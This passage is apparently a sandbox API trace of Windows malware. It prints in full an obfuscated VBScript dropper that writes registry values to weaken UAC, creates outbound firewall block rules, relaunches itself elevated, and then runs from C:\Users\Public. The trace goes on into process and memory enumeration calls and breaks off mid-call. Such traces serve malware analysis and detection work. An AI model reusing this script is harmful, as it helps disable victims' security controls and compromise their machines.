bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", cchWideChar=4199, lpMultiByteStr=0x714d2e8, cbMultiByte=4199, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="On Error Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", lpUsedDefaultChar=0x0) returned 4199 [0221.429] WriteFile (in: hFile=0x944, lpBuffer=0x714d2e8*, nNumberOfBytesToWrite=0x1067, lpNumberOfBytesWritten=0x68ff478, lpOverlapped=0x0 | out: lpBuffer=0x714d2e8*, lpNumberOfBytesWritten=0x68ff478, lpOverlapped=0x0) returned 1 [0221.431] CloseHandle (hObject=0x944) returned 1 [0221.433] GetFileAttributesW (lpFileName="C:\\Users\\Public\\") returned 0x11 [0221.433] GetComputerNameW (in: lpBuffer=0x71e03f4, nSize=0x68ff4b8 | out: lpBuffer="N3EERVTWSM", nSize=0x68ff4b8) returned 1 [0221.433] GetComputerNameW (in: lpBuffer=0x71e041c, nSize=0x68ff4f4 | out: lpBuffer="N3EERVTWSM", nSize=0x68ff4f4) returned 1 [0221.433] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="cmd /k \"C:\\Users\\Public\\N3Eg\\N3E.vbs\"", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0221.433] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="cmd /k \"C:\\Users\\Public\\N3Eg\\N3E.vbs\"", cchWideChar=37, lpMultiByteStr=0x71fc6bc, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd /k \"C:\\Users\\Public\\N3Eg\\N3E.vbs\"", lpUsedDefaultChar=0x0) returned 37 [0221.434] WinExec (lpCmdLine="cmd /k \"C:\\Users\\Public\\N3Eg\\N3E.vbs\"", uCmdShow=0x0) returned 0x21 [0221.446] KillTimer (hWnd=0x1015c, uIDEvent=0x1) returned 1 [0221.446] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0221.446] IsWindowUnicode (hWnd=0x30150) returned 1 [0221.446] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0221.446] GetCapture () returned 0x0 [0221.446] GetWindowThreadProcessId (in: hWnd=0x30150, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0221.446] GetCurrentProcessId () returned 0x4f0 [0221.446] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0221.446] GetPropW (hWnd=0x30150, lpString=0xc031) returned 0x0 [0221.446] GetParent (hWnd=0x30150) returned 0x0 [0221.446] TranslateMessage (lpMsg=0x68ff884) returned 0 [0221.446] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0221.446] GetForegroundWindow () returned 0x10166 [0221.447] SendMessageW (hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0221.447] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0221.447] GetCurrentThreadId () returned 0xc04 [0221.447] GetCurrentThreadId () returned 0xc04 [0221.447] GetCurrentThreadId () returned 0xc04 [0221.447] GetCurrentThreadId () returned 0xc04 [0221.447] GetCurrentThreadId () returned 0xc04 [0221.447] GetCurrentThreadId () returned 0xc04 [0221.447] GetClassNameW (in: hWnd=0x10166, lpClassName=0x68ff44e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0221.447] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0221.447] IsWindowUnicode (hWnd=0x500fe) returned 1 [0221.447] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0221.447] GetCapture () returned 0x0 [0221.447] GetWindowThreadProcessId (in: hWnd=0x500fe, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0221.447] GetCurrentProcessId () returned 0x4f0 [0221.447] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0221.447] GetPropW (hWnd=0x500fe, lpString=0xc031) returned 0x0 [0221.448] GetParent (hWnd=0x500fe) returned 0x0 [0221.448] TranslateMessage (lpMsg=0x68ff884) returned 0 [0221.448] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0221.448] KillTimer (hWnd=0x500fe, uIDEvent=0x1) returned 1 [0221.448] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x6ba8bec, lpParameter=0x71d84c0, dwCreationFlags=0x4, lpThreadId=0x71edf64 | out: lpThreadId=0x71edf64*=0xf00) returned 0x944 [0221.449] ResumeThread (hThread=0x944) returned 0x1 [0221.449] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0221.449] IsWindowUnicode (hWnd=0x30154) returned 1 [0221.449] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0221.449] GetCapture () returned 0x0 [0221.449] GetWindowThreadProcessId (in: hWnd=0x30154, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0221.449] GetCurrentProcessId () returned 0x4f0 [0221.449] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0221.449] GetPropW (hWnd=0x30154, lpString=0xc031) returned 0x0 [0221.449] GetParent (hWnd=0x30154) returned 0x0 [0221.449] TranslateMessage (lpMsg=0x68ff884) returned 0 [0221.449] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0221.449] GetFileAttributesW (lpFileName="C:\\Users\\Public\\") returned 0x11 [0221.449] GetComputerNameW (in: lpBuffer=0x71e037c, nSize=0x68ff5fc | out: lpBuffer="N3EERVTWSM", nSize=0x68ff5fc) returned 1 [0221.450] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\id" (normalized: "c:\\users\\public\\n3eg\\id"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x66c [0221.450] SetFilePointer (in: hFile=0x66c, lDistanceToMove=0, lpDistanceToMoveHigh=0x68ff5b0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x68ff5b0*=0) returned 0x0 [0221.450] SetFilePointer (in: hFile=0x66c, lDistanceToMove=0, lpDistanceToMoveHigh=0x68ff5b0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x68ff5b0*=0) returned 0x7 [0221.450] SetFilePointer (in: hFile=0x66c, lDistanceToMove=0, lpDistanceToMoveHigh=0x68ff5b0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x68ff5b0*=0) returned 0x0 [0221.450] SetFilePointer (in: hFile=0x66c, lDistanceToMove=0, lpDistanceToMoveHigh=0x68ff5bc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x68ff5bc*=0) returned 0x0 [0221.450] ReadFile (in: hFile=0x66c, lpBuffer=0x71d1938, nNumberOfBytesToRead=0x7, lpNumberOfBytesRead=0x68ff5c0, lpOverlapped=0x0 | out: lpBuffer=0x71d1938*, lpNumberOfBytesRead=0x68ff5c0*=0x7, lpOverlapped=0x0) returned 1 [0221.452] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x71d1938, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0221.452] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x71d1938, cbMultiByte=7, lpWideCharStr=0x71ca578, cchWideChar=7 | out: lpWideCharStr="load-s1") returned 7 [0221.452] CloseHandle (hObject=0x66c) returned 1 [0221.452] GetCurrentThreadId () returned 0xc04 [0221.452] GetCurrentThreadId () returned 0xc04 [0221.452] GetCurrentThreadId () returned 0xc04 [0221.480] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75900000 [0221.480] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0221.480] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x71e711c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateToolhelp32Snapshot", lpUsedDefaultChar=0x0) returned 24 [0221.480] GetProcAddress (hModule=0x75900000, lpProcName="CreateToolhelp32Snapshot") returned 0x7593f731 [0221.481] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0221.481] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x71ca59c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListFirst", lpUsedDefaultChar=0x0) returned 15 [0221.481] GetProcAddress (hModule=0x75900000, lpProcName="Heap32ListFirst") returned 0x759902e7 [0221.481] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0221.481] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x71ca59c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListNext", lpUsedDefaultChar=0x0) returned 14 [0221.482] GetProcAddress (hModule=0x75900000, lpProcName="Heap32ListNext") returned 0x75990391 [0221.482] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0221.482] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x71ca59c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32First", lpUsedDefaultChar=0x0) returned 11 [0221.483] GetProcAddress (hModule=0x75900000, lpProcName="Heap32First") returned 0x75990429 [0221.483] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0221.483] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x71ca59c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32Next", lpUsedDefaultChar=0x0) returned 10 [0221.484] GetProcAddress (hModule=0x75900000, lpProcName="Heap32Next") returned 0x75990614 [0221.484] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0221.484] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x71e711c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Toolhelp32ReadProcessMemory", lpUsedDefaultChar=0x0) returned 27 [0221.485] GetProcAddress (hModule=0x75900000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x75990819 [0221.485] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0221.485] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x71ca59c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32First", lpUsedDefaultChar=0x0) returned 14 [0221.485] GetProcAddress (hModule=0x75900000, lpProcName="Process32First") returned 0x7596443d [0221.486] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0221.486] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x71ca59c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32Next", lpUsedDefaultChar=0x0) returned 13 [0221.486] GetProcAddress (hModule=0x75900000, lpProcName="Process32Next") returned 0x75964505 [0221.486] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0221.486] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x71ca59c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0221.487] GetProcAddress (hModule=0x75900000, lpProcName="Process32FirstW") returned 0x7593fa35 [0221.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0221.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x71ca59c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0221.489] GetProcAddress (hModule=0x75900000, lpProcName="Process32NextW") returned 0x7593faca [0221.489] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0221.489] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x71ca59c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0221.489] GetProcAddress (hModule=0x75900000, lpProcName="Process32FirstW") returned 0x7593fa35 [0221.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0221.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x71ca59c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0221.490] GetProcAddress (hModule=0x75900000, lpProcName="Process32NextW") returned 0x7593faca [0221.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0221.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x71ca59c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32First", lpUsedDefaultChar=0x0) returned 13 [0221.491] GetProcAddress (hModule=0x75900000, lpProcName="Thread32First") returned 0x75967e4c [0221.491] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0221.491] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x71ca59c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32Next", lpUsedDefaultChar=0x0) returned 12 [0221.492] GetProcAddress (hModule=0x75900000, lpProcName="Thread32Next") returned 0x75967edc [0221.492] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, 